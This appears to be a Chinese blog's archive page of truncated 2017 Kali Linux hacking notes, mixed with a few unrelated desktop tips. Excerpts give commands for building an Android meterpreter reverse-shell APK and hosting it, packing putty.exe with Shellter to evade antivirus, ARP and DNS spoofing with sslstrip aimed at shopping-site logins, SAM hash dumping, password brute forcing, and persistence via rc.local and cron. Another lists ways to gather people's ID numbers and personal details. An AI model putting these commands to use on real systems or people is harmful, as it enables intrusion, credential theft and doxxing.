02 2017 档案
摘要:Mifare Classic 提供 1 Kb 4Kb 的容量,现在国内采用的多数是 Mifare Classic 1k(S50)[后面简称 M1 卡] M1 卡有从 0 到 15 共 16 个扇区,每个扇区配备了从 0 到 3 共 4 个段,每个段可以保存 16 字节的内容 每个扇区的第 4 个段(
阅读全文
摘要:import optparse parser = optparse.OptionParser('[ ] Usage %prog '+\ ' H l [ p F ]') parser.add_option(' H', dest='tgtHost', type='string',\ help='spec
阅读全文
摘要:配置python 函数 (1)在Python中采用def关键字进行函数的定义,不用指定返回值的类型。 (2)函数参数params可以是零个、一个或者多个,同样的,函数参数也不用指定参数类型,因为在Python中变量都是弱类型的,Python会自动根据值来维护其类型。 (3)return语句是可选的,
阅读全文
摘要:http://www.freebuf.com/sectool/76361.html
阅读全文
摘要:http://jingyan.baidu.com/article/0eb457e5045bd703f1a9051d.html yersinia G
阅读全文
摘要:https://www.hackfun.org/kali tools/kali tools zh.html
阅读全文
摘要:端口扫描 auxiliary/scanner/portscan scanner/portscan/ack ACK防火墙扫描 scanner/portscan/ftpbounce FTP跳端口扫描 scanner/portscan/syn SYN端口扫描 scanner/portscan/tcp TC
阅读全文
摘要:使用命令: 破解ssh登录名和密码 msconsole回车 search ssh 查找ssh相关的模块 use auxiliary/scanner/ssh/ssh_login 调用ssh破解程序 show options 查看选项 set rhosts 127.0.0.1 设置要破解的IP地址(必须
阅读全文
摘要:scp /root/Downloads/cymothoa 1 beta.tar.gz root@192.168.1.66:/root/ rc.local exit 0前加入: sh /root/abc.sh cron: service cron status update rc.d cron ena
阅读全文
摘要:http://www.freebuf.com/articles/system/91791.html nc v 192.168.110 443 CMD: start /B mybat.bat netsh配置windows7防火墙: netsh advfirewall set allprofiles s
阅读全文
摘要:cd /usr/local/lynis ./lynis man 全部检查: ./lynis check all Q 采用crontab自动检查: ./lynis c auditor "automated" cronjob /var/log/lynis/report.txt 查看日志中的敏感信息 gr
阅读全文
摘要:DVWA默认的用户有5个,用户名密码如下(一个足以): admin/password gordonb/abc123 1337/charley pablo/letmein smithy/password
阅读全文
摘要:安装 dpkg i netease cloud music_1.0.0_amd64.kali2.0(yagami).deb apt get f install dpkg i netease cloud music_1.0.0_amd64.kali2.0(yagami).deb root 运行 网易云
阅读全文
摘要:1. msfvenom p android/meterpreter/reverse_tcp LHOST=192.168.1.237 LPORT=4444 R shell.apk 2. service apache2 start 3. mv shell.apk /var/www/html 4. msf
阅读全文
摘要:本地社工库:数据库极搜,txt文本分割器 whois 前程无忧 智联招聘 铁路订票获取身份证 http://www.idtag.cn/reg_id/index.html 身份信息核对 姓名 QQ号 电话号码 邮箱 常用ID 生日 你喜欢的人 你喜欢的一个名字 你最熟悉的东西 支付宝 zhangzhu
阅读全文
摘要:1. 开转发 2. arpspoof i eth0 t 192.168.110 192.168.1.1 3. ettercap Tq i eth0 1. /etc/ettercap/etter.conf /Linux 去掉 2. sslstrip a s k 淘宝加密的太好啦,看不出密码。。。 1.
阅读全文
摘要:which vlc 或者 whereis vlc 输入/geteuid,输入i进入输入模式,将geteuid改成getppid,然后ESC,输入wq,保存退出,这样程序root用户就可以运行了。 chrome、vlc等程序使root用户无法使用的原理是:它获取程序的所有者,如果它是root用户,就让
阅读全文
摘要:Kali Linux系统默认状态下,root用户是无法使用声卡的,也就没有声音。启用的方法如下: (1)在终端执行命令:systemctl user enable pulseaudio (2)在/etc/default/目录下,创建一个文件,命名为pulseaudio,并添加以下内容: PULSEA
阅读全文
摘要:薄荷开元网 http://www.mintos.org/
阅读全文
摘要:1. win32diskimager写入kalilinux镜像,建议用parrot sec os 2. gparted /dev/sdb,新建分区sdb3,Lable输入persistence 4. 挂载/dev/sdb3,echo "/ union" /root/usbsdb3/persisten
阅读全文
摘要:Kali Linux渗透基础知识整理(二):漏洞扫描 :http://www.freebuf.com/sectool/109952.html DVWA(dema vulnerable web application)是一个基于PHP/MYSQL环境写的一个web应用。他的主要目的是帮助安全专业员去测
阅读全文
摘要:nmap Pn sV oX dmz 192.168.1.0/24 db_import /root/dmz db_hosts db_hosts d ip db_services db_hosts h db_autopwn t p e(自动工具所有的ip) db_autopwn t p I ip e(攻
阅读全文
摘要:加壳: 1. wineconsole shellter 2. A,选自动 3. 将putty.exe移到/usr/share/shllter/目录,PE设置为putty.exe 4. LHOST,LPORT 监视: 1. use exploit/multi/handler 2. set payloa
阅读全文
摘要:Authentication Flood,mdk3下参数为a: mdk3 mon0 a –a AP的MAC地址(BSSID) c来对指定的频道进行攻击 a固定bssid进行攻击 s控制发包速率。一般默认的是200个包/秒 mdk3 mon0 d s参数来加快发包速率 w(白名单) –b(黑名单)来添
阅读全文
摘要:msfvenom 选项: p, payload 有效载荷使用。指定一个有效的自定义载荷 payload options 列出有效载荷的标准选项 l, list [type] 列出一个模块类型。选项有:有效载荷,编码器,NOP,所有 n, nopsled 在一个nopsled [长度]的大小对有效载荷
阅读全文
摘要:burpsuite nessus w3af sqlmap openvas shellcode
阅读全文
摘要:db_status db_disconnect db_connect 用户名:口令@服务器地址:端口/数据库名称 createdb msf4 E UTF8 T template0 o msf3 hosts dropdb msf4 db_nmap db_nmap Pn sV oX dmz 192.16
阅读全文
摘要:echo LANG="zh_CN.UTF 8" /etc/default/locale
阅读全文
摘要:安装openvas: apt install openvas openvas setup netstat antp openvas start Point your browser to https://127.0.0.1:9392, accept the self signed SSL certi
阅读全文
摘要:exploit 漏洞利用代码 编码器模块:免杀、控制 help [cmd] msfcli适合对网络中大量系统统一测试。 打开数据包路由转发功能:/etc/sysctl.conf /etc/rc.local iptables t nat A POSTROUTING s 192.168.10.0/24
阅读全文
摘要:" meterpreter详解与渗透实战 " 基本命令: background quit shell irb client.sys.config.sysinfo() 调用windows API:client.core.use("railgun") 弹出会话窗口:client.railgun.user
阅读全文
摘要:cd /target/windows/system32/config 使用 SamDump2 来提取哈希,并将文件放到你的 root 用户目录中的一个叫做 hashes 的 文件夹中。 samdump2 system SAM /root/hashes/hash.txt john /root/hash
阅读全文
摘要:1. vim /etc/etterconf 2. 将 ec_uid 和 ec_gid 改为 0 3. 需要取消下面的 IPTABLES 行的注释。它在靠近文件末尾的 LINUX 一节 4. ettercap G 5. Shift + U 6. Ctrl + S 7. Ctrl + W 8. 最后,我
阅读全文
摘要:medusa –M http h 192.168.10.1 u admin P /usr/share/wfuzz/ wordlist/fuzzdb/wordlists user passwd/passwds/john.txt e ns n 80 F M http 允许我们指定模块。这里,我们选择了
阅读全文
摘要:meterpeter: 1. 可以在 Meterpreter 使用 incognito 来开始模拟过程: use incognito 2. 展示 incognito 的帮助文档,通过输入 help 命令: help 3. 获得可用用户的列表 list_tokens –u 4. 模拟攻击 impers
阅读全文
摘要:msfconsole的命令: msfconsole use module :这个命令允许你开始配置所选择的模块。 set optionname module :这个命令允许你为指定的模块配置不同的选项。 exploit :这个命令启动漏洞利用模块 run :这个命令启动非漏洞利用模块。 search
阅读全文
摘要:Nessus\OpenVAS http://www.tenable.com/products/nessus/select your operating system http://www.nessus.org/products/nessus/nessus plugins/obtain an acti
阅读全文
摘要:dns扫描: dnsenum enum www.baidu.com threads [number] 一次运行的线程数量 r 递归查找 d 允许你设置在WHOIS请求之间的时间延迟,单位为秒。 o 允许我们制定输出位置。 w 允许我们开启WHOIS查询。 判断主机是否开着: nmap sP 216.
阅读全文
摘要:service postgresql start service metasploit start msfconsole db_status 配置metasploit随系统启动: update rc.d postgresql enable update rc.d metasploit enable
阅读全文
摘要:改hosts: /windows/system32/driver/etc/hosts 路由器后台admin admin
阅读全文
摘要:一、简介 hydra(九头蛇)全能暴力破解工具,是一款全能的暴力破解工具,使用方法简单 二、使用 使用hydra h 查看基本用法 三、命令 hydra [[[ l LOGIN| L FILE] [ p PASS| P FILE]] | [ C FILE]] [ e ns][ o FILE] [ t
阅读全文
摘要:1、社会工程学攻击 2、快速追踪测试 3、第三方模块 4、升级软件 5、升级配置 6、帮助 99、退出 1、鱼叉式网络钓鱼攻击 2、网页攻击 3、传染媒介式(俗称木马) 4、建立payloaad和listener 5、邮件群发攻击(夹杂木马啊payload的玩意发给你) 6、Arduino基础攻击
阅读全文
摘要:"查看原文" 1. 选1,social ensineering attacks 2. 选4,create a payload and listener 3. 选2,Windows Reverse_TCP Meterpreter 4. LHOST 192.168.1.92 5. PORT 443 6.
阅读全文
摘要:首先编辑网页,打开apache2服务器,编辑好etter.dns 然后开始ettercap G 的操作 1. sniff选择好自己使用的网卡 2. scan hosts ,扫描完将目标和网关添加到目标一目标二 3. mitm 选择毒化类型arp poisoning 4. 选择dns_spoof 5.
阅读全文
摘要:nmap sP 192.168.80.201 主机发现 nmap sT TCP端口扫描 nmap sS SYN半扫描方式 nmap sV UDP端口扫描 nmap O P0 主机操作系统类型
阅读全文
摘要:本地主机:192.168.0.149 目标主机:192.168.0.138 /etc/ettercap/etter.dns,将dns欺骗到本机 ettercap T q i wlan0 P dns_spoof M arp // // 攻击目标,网关地址 T 文本模式 q 安静模式 P 插件 M 开始
阅读全文
摘要:msfconsole show use exploit/windows/smb/ms10_046_shortcut_icon_dlloader show options
阅读全文
摘要:1.解锁卷的命令。 zuluCrypt cli o d /dev/sdc1 m blabla e ro f /home/keyFile zuluCrypt cli o d /dev/sdc1 m blabla e ro p xxx zuluCrypt cli o d /dev/sdc1 m blab
阅读全文
摘要:wpscan –url www.xxx.com 扫描基本信息 wpscan –url www.xxx.com –enumerate p 扫描插件基本信息 wpscan –url www.xxx.com –enumerate vp 扫描容易受攻击的插件 wpscan –url www.xxx.com
阅读全文
摘要:sudo apt get install firefox locale zh hans
阅读全文
摘要:1. win+方向键 将软件窗口放置到方向 2. ctrl+win+左右方向键 切换虚拟桌面 3. win+tab 选择窗口或虚拟桌面,然后按着win随后放开,界面停留 4. alt+tab 切换窗口 5. ctrl+win+D 创建新的虚拟桌面 6. ctrl+win+F4 关闭当前虚拟桌面
阅读全文
浙公网安备 33010602011771号